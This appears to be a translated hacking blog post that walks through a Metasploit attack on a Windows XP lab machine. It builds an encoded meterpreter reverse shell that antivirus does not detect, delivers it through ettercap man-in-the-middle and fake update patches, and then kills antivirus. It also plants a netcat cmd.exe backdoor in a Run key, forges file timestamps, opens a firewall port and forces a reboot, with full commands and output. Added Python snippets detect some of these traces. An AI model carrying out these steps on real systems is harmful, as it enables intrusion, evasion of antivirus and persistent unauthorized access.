.so let's make ur choice kiddo, referring back to the previous article.
.meterpreter, not encoded.
[email protected]:/pentest/exploits/framework3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.12 LPORT=455 X > meterpreter_1.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 278
Options: LHOST=192.168.0.12,LPORT=455
http://www.virustotal.com/analisis/4b0a655b264b23b2f4dab74688c8890e
Result: 1/39
.meterpreter with XOR encoding (x86/shikata_ga_nai).
[email protected]:/pentest/exploits/framework3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.12 LPORT=455 R | ./msfencode -e x86/shikata_ga_nai -b '' -t exe -o meterpreter_2.exe
[*] x86/shikata_ga_nai succeeded, final size 306
http://www.virustotal.com/analisis/cbb1cf1a7ce9943c5d8d15f210da8361
Result: 0/39 (0%)
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.0.12
LHOST => 192.168.0.12
msf exploit(handler) > set LPORT 455
LPORT => 455
msf exploit(handler) > exploit
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
.next move is critical, well now the attacker has to make the target execute meterpreter_2.exe; honestly this depends on your own imagination.
.the author himself chose ettercap as the bridge, using the MITM method. it can be done with an ettercap filter that produces a popup every time the target browses.
.or with the combination evilgrade( www.infobyte.com.ar )+ettercap with DNS spoofing, which indirectly tricks the target into applying a fake patch
for some of the programs available in evilgrade, e.g. winamp, winzip, notepad++; you can also add your own module to evilgrade, for firefox or thunderbird (-.-).
.after the target executes meterpreter_2.exe.
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (192.168.0.12:455 -> 192.168.0.5:1037)
meterpreter > sysinfo
Computer: PENTEST3
OS : Windows XP (Build 2600, Service Pack 3).
.with remote desktop.
.there is also one for Virtual Network Computing, look it up; i prefer CLI over GUI (^^)V.
meterpreter > run getgui
-----------------passing------------------------
.kill AV.
meterpreter > run killav
[*] Killing Antivirus services on the target...
.ok, you can also edit killav.rb to add some AV process names of your own to the list.
[email protected]:~# vi /pentest/exploits/framework3/scripts/meterpreter/killav.rb
#
# Meterpreter script that kills all Antivirus processes
# Provided by: Jerome Athias
#
print_status("Killing Antivirus services on the target...")
avs = %W{
AAWTray.exe
Ad-Aware.exe
MSASCui.exe
_avp32.exe
_avpcc.exe
_avpm.exe
aAvgApi.exe
ackwin32.exe
adaware.exe
advxdwin.exe
agentsvr.exe
agentw.exe
alertsvc.exe
alevir.exe
alogserv.exe
amon9x.exe
anti-trojan.exe
-----------------cut------------------------
windows enumeration
meterpreter > run winenum
[*] Running Windows Local Enumerion Meterpreter Script
[*] New session on 192.168.0.5:1037...
[*] Saving report to /neo/.msf3/logs/winenum/192.168.0.5_20090216.174854613/192.168.0.5_20090216.174854613.txt
[*] Checking if PENTEST3 is a Virtual Machine ........
[*] This is a VMWare virtual Machine
[*] Running Command List ...
[*] running command cmd.exe /c set
[*] running command arp -a
[*] running command ipconfig /all
[*] running command ipconfig /displaydns
[*] running command route print
[*] running command net view
[*] running command netstat -nao
[*] running command netstat -vb
[*] running command netstat -ns
[*] running command net accounts
[*] running command net accounts /domain
[*] running command net session
-----------------cut------------------------
example output winenum
[email protected]:~# cat /neo/.msf3/logs/winenum/192.168.0.5_20090216.174854613/192.168.0.5_20090216.174854613.txt
Date: 2009-02-16.02:17:48
Running as: PENTEST3\pentest3
Host: PENTEST3
OS: Windows XP (Build 2600, Service Pack 3).
This is a VMWare virtual Machine
*****************************************
Output of cmd.exe /c set
*****************************************
ALLUSERSPROFILE=C:\Documents and Settings\All Users
APPDATA=C:\Documents and Settings\pentest3\Application Data
CLIENTNAME=Console
CommonProgramFiles=C:\Program Files\Common Files
COMPUTERNAME=PENTEST3
ComSpec=C:\WINDOWS\system32\cmd.exe
FP_NO_HOST_CHECK=NO
HOMEDRIVE=C:
HOMEPATH=\Documents and Settings\pentest3
LOGONSERVER=\\PENTEST3
NUMBER_OF_PROCESSORS=2
OS=Windows_NT
Path=C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86 Family 6 Model 15 Stepping 13, GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=0f0d
ProgramFiles=C:\Program Files
PROMPT=$P$G
SESSIONNAME=Console
SystemDrive=C:
SystemRoot=C:\WINDOWS
TEMP=C:\DOCUME~1\pentest3\LOCALS~1\Temp
TMP=C:\DOCUME~1\pentest3\LOCALS~1\Temp
USERDOMAIN=PENTEST3
-----------------cut------------------------
.what about the winenum ruby script in framework3/scripts/meterpreter/winenum.rb.
.the author modified it so that what gets dumped is My Documents instead of the registry ^_^V.
.netcat as backdoor.
.the swiss army knife uses TCP and UDP to make connections; the author will discuss its use as a backd00r on a wind#ws b0x.
.even though many antivirus products regard netcat as a hacktool.
meterpreter > use priv
Loading extension priv...success.
meterpreter > upload /tmp/system32.exe C:\windows\system32
[*] uploading : /tmp/system32.exe -> C:\windows\system32
[*] uploaded : /tmp/system32.exe -> C:\windows\system32\system32.exe
.change file times.
meterpreter > timestomp C:\windows\system32\system32.exe -v
Modified : Tue Feb 24 20:27:49 -0500 2009
Accessed : Thu Feb 26 09:29:39 -0500 2009
Created : Tue Feb 24 20:27:49 -0500 2009
Entry Modified: Thu Feb 26 09:29:39 -0500 2009
meterpreter > timestomp C:\windows\system32\system32.exe -b
[*] Blanking file MACE attributes on C:\windows\system32\system32.exe
meterpreter > timestomp C:\windows\system32\system32.exe -f C:\windows\system32\cmd.exe
[*] Setting MACE attributes on C:\windows\system32\system32.exe from C:\windows\system32\cmd.exe
meterpreter > timestomp C:\windows\system32\system32.exe -v
Modified : Sun Apr 13 18:42:16 -0400 2008
Accessed : Sat Feb 28 05:06:19 -0500 2009
Created : Thu Aug 23 08:00:00 -0400 2001
Entry Modified: Sat Feb 28 05:06:19 -0500 2009
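From the defender's side, an added example (not part of the original post) that flags the traces timestomp leaves: it parses the `timestomp -v` output format shown above and compares the $STANDARD_INFORMATION times with the file's $FILE_NAME creation time, which timestomp does not rewrite. The $FN value and the sample MACE block are constructed here; on a real system they come from the MFT.

```python
from datetime import datetime, timezone

FMT = "%a %b %d %H:%M:%S %z %Y"                          # what "timestomp -v" prints
NTFS_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)   # what "timestomp -b" writes

def parse_mace(text):
    """Parse 'timestomp <file> -v' output into {Modified, Accessed, Created, Entry Modified}."""
    mace = {}
    for line in text.strip().splitlines():
        name, _, value = line.partition(":")          # first ':' only; times contain ':'
        mace[name.strip()] = datetime.strptime(value.strip(), FMT)
    return mace

def timestomp_indicators(si, fn_created):
    """Return the reasons a file's $SI timestamps look tampered with.

    si: dict from parse_mace (the $STANDARD_INFORMATION values).
    fn_created: the $FILE_NAME creation time, which timestomp leaves alone.
    """
    reasons = []
    if any(t.astimezone(timezone.utc) == NTFS_EPOCH for t in si.values()):
        reasons.append("blanked MACE (1601-01-01 epoch)")
    if si["Created"] < fn_created:
        reasons.append("$SI Created earlier than $FN Created")
    if si["Created"] > si["Modified"]:
        reasons.append("Created after Modified")
    return reasons

# Constructed sample: the MACE values after the '-f C:\windows\system32\cmd.exe' copy above.
AFTER_COPY = """
Modified : Sun Apr 13 18:42:16 -0400 2008
Accessed : Sat Feb 28 05:06:19 -0500 2009
Created : Thu Aug 23 08:00:00 -0400 2001
Entry Modified: Sat Feb 28 05:06:19 -0500 2009
"""
# Constructed $FN creation time: when the upload really wrote the file (assumption).
FN_CREATED = datetime.strptime("Thu Feb 26 09:29:39 -0500 2009", FMT)

if __name__ == "__main__":
    print(timestomp_indicators(parse_mace(AFTER_COPY), FN_CREATED))
```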
meterpreter > reg enumkey -k HKLM\software\microsoft\windows\currentversion\run
Enumerating: HKLM\software\microsoft\windows\currentversion\run
Values (3):
SunJavaUpdateSched
VMware Tools
VMware User Process
meterpreter > reg setval -k HKLM\software\microsoft\windows\currentversion\run -v system32 -d "C:\windows\system32\system32.exe -Ldp 455 -e cmd.exe"
Successful set system32.
meterpreter > reg queryval -k HKLM\software\microsoft\windows\currentversion\Run -v system32
Key: HKLM\software\microsoft\windows\currentversion\Run
Name: system32
Type: REG_SZ
Data: C:\windows\system32\system32.exe -Ldp 455 -e cmd.exe
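An added example (not from the original post) of how a defender would audit Run-key values for a netcat-style entry like the one just added: it tokenises each command line, expands combined short flags such as -Ldp, and reports listener/shell flags and an executable named after its own directory. The benign values are constructed to mirror the three names enumerated above; on a live host you would read the key with winreg and pass each value in.

```python
import ntpath
import re
import shlex

RUN_KEY = r"HKLM\software\microsoft\windows\currentversion\run"
SHELL_BINARIES = ("cmd.exe", "command.com")

def _flags(args):
    """Split netcat-style combined short options (-Ldp -> -L, -d, -p)."""
    out = set()
    for a in args:
        if re.fullmatch(r"-[A-Za-z]{2,}", a):
            out.update("-" + c for c in a[1:])
        else:
            out.add(a)
    return out

def inspect_run_value(data):
    """Return the reasons a Run-key command line looks like a listener backdoor."""
    argv = shlex.split(data, posix=False)      # Windows-style: backslashes are literal
    if not argv:
        return []
    exe = argv[0].strip('"')
    flags = _flags(argv[1:])
    reasons = []
    if "-e" in flags and any(a.lower() in SHELL_BINARIES for a in argv[1:]):
        reasons.append("-e hands the connection to a shell (netcat -e cmd.exe)")
    if flags & {"-l", "-L"} and "-p" in flags:
        reasons.append("binds a listening port (-l/-L with -p)")
    if ntpath.basename(exe).lower() == ntpath.basename(ntpath.dirname(exe)).lower() + ".exe":
        reasons.append("executable named after its own directory (system32.exe)")
    return reasons

def audit_run_key(values):
    """values: {name: data} as reg enumkey/queryval return them. Returns {name: reasons}."""
    findings = {}
    for name, data in values.items():
        reasons = inspect_run_value(data)
        if reasons:
            findings[name] = reasons
    return findings

# Constructed sample (benign paths are assumptions, not read from the target).
SAMPLE_RUN = {
    "SunJavaUpdateSched": r'"C:\Program Files\Java\jre6\bin\jusched.exe"',
    "VMware Tools": r'"C:\Program Files\VMware\VMware Tools\VMwareTray.exe"',
    "VMware User Process": r'"C:\Program Files\VMware\VMware Tools\VMwareUser.exe"',
    "system32": r"C:\windows\system32\system32.exe -Ldp 455 -e cmd.exe",
}

if __name__ == "__main__":
    for name, reasons in audit_run_key(SAMPLE_RUN).items():
        print(RUN_KEY, name, "->", "; ".join(reasons))
```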
.bypass XP default firewall.
.there are 2 methods to bypass the XP firewall, via the registry or via the network shell (netsh).
.with registry edit.
meterpreter > reg enumkey -k HKLM\system\controlset001\services\sharedaccess\parameters\firewallpolicy\Standardprofile\authorizedapplications\list
Enumerating: HKLM\system\controlset001\services\sharedaccess\parameters\firewallpolicy\Standardprofile\authorizedapplications\list
No children.
meterpreter > reg setval -k HKLM\system\controlset001\services\sharedaccess\parameters\firewallpolicy\Standardprofile\authorizedapplications\list -v system32 -d "C:\WINDOWS\system32\system32.exe:*:Enabled:system32"
Successful set system32.
meterpreter > reg queryval -k HKLM\system\controlset001\services\sharedaccess\parameters\firewallpolicy\Standardprofile\authorizedapplications\list -v system32
Key: HKLM\system\controlset001\services\sharedaccess\parameters\firewallpolicy\Standardprofile\authorizedapplications\list
Name: system32
Type: REG_SZ
Data: C:\WINDOWS\system32\system32.exe:*:Enabled:system32
.with “netsh” command.
C:\Documents and Settings\pentest3\Desktop>Netsh firewall show opmode
Netsh firewall show opmode
Domain profile configuration:
-------------------------------------------------------------------
Operational mode = Enable
Exception mode = Enable
Standard profile configuration (current):
-------------------------------------------------------------------
Operational mode = Enable <<<< this
Exception mode = Enable <<<< this
Local Area Connection 2 firewall configuration:
-------------------------------------------------------------------
Operational mode = Enable
.the interesting firewall setting there is that operational mode and exception mode are both enabled.
.so the attacker can add an open port.
C:\Documents and Settings\pentest3\Desktop>netsh firewall add portopening TCP 455 "Service Firewall" ENABLE ALL
netsh firewall add portopening TCP 455 "Service Firewall" ENABLE ALL
ok.
C:\Documents and Settings\pentest3\Desktop>netsh firewall show portopening
netsh firewall show portopening
Port configuration for Domain profile:
Port Protocol Mode Name
-------------------------------------------------------------------
139 TCP Enable NetBIOS Session Service
445 TCP Enable SMB over TCP
137 UDP Enable NetBIOS Name Service
138 UDP Enable NetBIOS Datagram Service
Port configuration for Standard profile:
Port Protocol Mode Name
-------------------------------------------------------------------
455 TCP Enable Service Firewall <<<< this
139 TCP Enable NetBIOS Session Service
445 TCP Enable SMB over TCP
137 UDP Enable NetBIOS Name Service
138 UDP Enable NetBIOS Datagram Service
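An added example (not from the original post) that audits both places the post adds a firewall exception: the AuthorizedApplications\List value format `<path>:<scope>:<Enabled|Disabled>:<name>` and the text of `netsh firewall show portopening`, flagging any-address exceptions, exceptions for binaries inside the system directory, and enabled ports outside the XP file-sharing baseline. Sample data is constructed from the output above.

```python
import re

# Ports XP's profiles open by default for file and printer sharing (the rows above).
BASELINE_PORTS = {("TCP", 139), ("TCP", 445), ("UDP", 137), ("UDP", 138)}
SYSTEM_DIRS = (r"c:\windows\system32", r"c:\winnt\system32")

def parse_authorized_app(data):
    """Split '<path>:<scope>:<Enabled|Disabled>:<name>'; rsplit keeps the drive colon in path."""
    path, scope, mode, name = data.rsplit(":", 3)
    return {"path": path, "scope": scope, "enabled": mode == "Enabled", "name": name}

def suspicious_app_exception(data):
    """Return the reasons an AuthorizedApplications\\List entry deserves review."""
    app = parse_authorized_app(data)
    reasons = []
    if app["enabled"] and app["scope"] == "*":
        reasons.append("enabled for any remote address (scope *)")
    if app["path"].lower().startswith(SYSTEM_DIRS):
        reasons.append("exception for a binary inside the system directory")
    return reasons

def parse_portopening(text):
    """Yield (profile, proto, port, enabled, name) rows from 'netsh firewall show portopening'."""
    profile = None
    for line in text.splitlines():
        head = re.match(r"Port configuration for (\w+) profile:", line)
        if head:
            profile = head.group(1)
            continue
        row = re.match(r"\s*(\d+)\s+(TCP|UDP)\s+(Enable|Disable)\s+(.*)$", line)
        if row and profile:
            yield profile, row.group(2), int(row.group(1)), row.group(3) == "Enable", row.group(4).strip()

def unexpected_ports(text):
    """Enabled port openings that are not part of the default baseline."""
    return [(prof, proto, port, name)
            for prof, proto, port, enabled, name in parse_portopening(text)
            if enabled and (proto, port) not in BASELINE_PORTS]

# Constructed sample: the registry value and (trimmed) netsh output shown above.
APP_ENTRY = r"C:\WINDOWS\system32\system32.exe:*:Enabled:system32"
NETSH_OUTPUT = """Port configuration for Standard profile:
Port Protocol Mode Name
-------------------------------------------------------------------
455 TCP Enable Service Firewall
139 TCP Enable NetBIOS Session Service
445 TCP Enable SMB over TCP
"""

if __name__ == "__main__":
    print(suspicious_app_exception(APP_ENTRY))
    print(unexpected_ports(NETSH_OUTPUT))
```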
.change target XP desktop wallpaper.
.by default XP names its desktop wallpaper wallpaper1.bmp, so we can replace it.
.is this funny?.
meterpreter > upload /neo/wallpaper1.bmp "C:\documents and settings\pentest3\local settings\application data\microsoft"
[*] uploading : /neo/wallpaper1.bmp -> C:\documents and settings\pentest3\local settings\application data\microsoft
[*] uploaded : /neo/wallpaper1.bmp -> C:\documents and settings\pentest3\local settings\application data\microsoft\wallpaper1.bmp
meterpreter > execute -H -i -f cmd.exe
Process 1096 created.
Channel 2 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\pentest3\Desktop>
.one more funny stuff.
.with the shutdown command the attacker can shutdown/restart with a timeout, with a funny message.
C:\Documents and Settings\pentest3\Desktop>shutdown -r -f -c "::your box are belong to us::" -t 13
shutdown -r -f -c "::your box are belong to us::" -t 13
msf > connect 192.168.0.5 455
[*] Connected to 192.168.0.5:455
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\pentest3>
are u making fun, kidd0?
upgrade ur evil mind and imagination, explore out of the sphere, think out of the box
make ur choice;
EOF--
I don’t know a word of Indonesian, but the commands are extremely helpful. Thanks for the help!